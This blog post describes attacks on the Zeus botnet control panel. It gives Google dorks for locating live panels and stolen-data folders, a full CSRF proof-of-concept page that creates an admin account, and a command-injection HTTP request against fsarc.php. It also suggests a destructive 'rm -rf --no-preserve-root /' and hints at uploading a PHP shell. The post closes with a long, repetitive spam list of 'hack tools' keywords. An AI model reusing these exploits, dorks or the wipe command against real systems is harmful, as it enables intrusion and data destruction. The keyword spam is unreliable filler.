Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
    • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler: 
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More info


  1. Hack Tools Pc
  2. Hack Tools
  3. Tools 4 Hack
  4. Hack Tools Online
  5. Hacker Tools Mac
  6. Nsa Hacker Tools
  7. Hacking Tools
  8. Hacker Search Tools
  9. Hacking Tools Download
  10. Hack Rom Tools
  11. Hack Tools 2019
  12. Hack Tool Apk
  13. Hacker Tools Apk Download
  14. Hack Tools For Mac
  15. Game Hacking
  16. Hacker Tool Kit
  17. Hacker Tools Mac
  18. Hacking Tools Mac
  19. Hacker Tools Free Download
  20. Pentest Tools Find Subdomains
  21. Hack Tools For Windows
  22. Hacking Tools For Windows Free Download
  23. Hacker
  24. Pentest Tools For Android
  25. Pentest Tools Review
  26. Pentest Tools Windows
  27. Hacker Tool Kit
  28. Hacker Tools Free
  29. Best Hacking Tools 2019
  30. Hack Tools
  31. Hack Tools For Games
  32. Hacking Tools For Windows Free Download
  33. Hacking Tools For Mac
  34. How To Make Hacking Tools
  35. Hack Tools Pc
  36. Pentest Tools For Windows
  37. New Hacker Tools
  38. New Hacker Tools
  39. Hacking Tools Free Download
  40. Hacker Tools Apk
  41. Hacking Tools Software
  42. New Hack Tools
  43. Hack Tools 2019
  44. Pentest Tools List
  45. Hack Apps
  46. Hacker Tool Kit
  47. Hacker Tools For Mac
  48. Hacking Tools Mac
  49. Hack Tools Mac
  50. Pentest Tools For Windows
  51. Hacking Tools Kit
  52. Hack Tool Apk No Root
  53. Best Hacking Tools 2020
  54. Hacking Tools For Windows Free Download
  55. Hack Tools Online
  56. Hacking Tools For Beginners
  57. Beginner Hacker Tools
  58. Hacker Tools Online
  59. Hacking Tools Software
  60. Top Pentest Tools
  61. Pentest Tools Tcp Port Scanner
  62. Hacking Tools Usb
  63. Hacker Tools For Windows
  64. Hack Tool Apk
  65. Hack Tools Mac
  66. Pentest Tools Framework
  67. Pentest Tools Website
  68. Pentest Tools Download
  69. Free Pentest Tools For Windows
  70. Hacking Tools Free Download
  71. Hacking Tools Name
  72. Pentest Tools Apk
  73. Hacking Tools For Windows Free Download
  74. Pentest Tools Kali Linux
  75. Hack Tools Pc
  76. Hacking Tools Mac
  77. Kik Hack Tools
  78. Pentest Tools Online
  79. Hacker Tools Linux
  80. Hack Website Online Tool
  81. Pentest Tools Find Subdomains
  82. Best Pentesting Tools 2018
  83. Hacker Tools Apk
  84. Hack Tools Pc
  85. Pentest Reporting Tools
  86. Hacker Tools 2020
  87. Hacking Tools Name
  88. Pentest Reporting Tools
  89. Hacker Tools Apk
  90. Android Hack Tools Github
  91. Black Hat Hacker Tools
  92. Pentest Reporting Tools
  93. Hacker Tools List
  94. Pentest Tools Android
  95. Nsa Hack Tools
  96. Computer Hacker
  97. Hacking Tools For Kali Linux
  98. Pentest Tools Bluekeep
  99. Pentest Tools Apk
  100. Hacking Tools Software
  101. Hacker
  102. Hack Tools For Windows
  103. Nsa Hack Tools Download
  104. Pentest Tools Find Subdomains
  105. Hacker Tools Free
  106. Pentest Tools Framework
  107. Pentest Tools Website Vulnerability
  108. Hacking Tools 2020
  109. Hacking Tools For Beginners
  110. Hacker Tools Hardware
  111. Hacking App
  112. Computer Hacker
  113. Pentest Tools Bluekeep
  114. Hack Tools For Ubuntu
  115. Pentest Tools Framework
  116. Hacking Tools For Beginners
  117. Pentest Tools Alternative
  118. Bluetooth Hacking Tools Kali
  119. Hacking App
  120. Wifi Hacker Tools For Windows
  121. Hack Tools
  122. Growth Hacker Tools
  123. New Hack Tools
  124. Hacker Tools Mac
  125. Hacking Tools 2020
  126. Hacker Tools For Pc
  127. Hacker Tools Hardware
  128. Hacker Tools
  129. Hacker Tool Kit
  130. Install Pentest Tools Ubuntu
  131. Tools For Hacker
  132. Hacker Tools 2019
  133. Physical Pentest Tools
  134. Hacker Security Tools
  135. Hacker Tools 2020
  136. Black Hat Hacker Tools
  137. Hacking Tools And Software
  138. Hackrf Tools
  139. Wifi Hacker Tools For Windows
  140. Github Hacking Tools
  141. Best Hacking Tools 2019
  142. Hacking Tools Mac
  143. Pentest Tools Free
  144. Hack Tools For Mac
  145. Pentest Tools For Windows
  146. Pentest Tools Nmap
  147. Pentest Tools For Android
  148. Hack Tools Mac
  149. Pentest Recon Tools
  150. Hacking Tools Windows 10
  151. Hacking Tools For Windows 7
  152. Black Hat Hacker Tools
  153. Hacker Tools Hardware
  154. Pentest Tools Github
  155. Hack Tools Pc
  156. Growth Hacker Tools
  157. Hacker Security Tools
  158. Computer Hacker

沒有留言:

張貼留言

訂閱: 張貼留言 (Atom)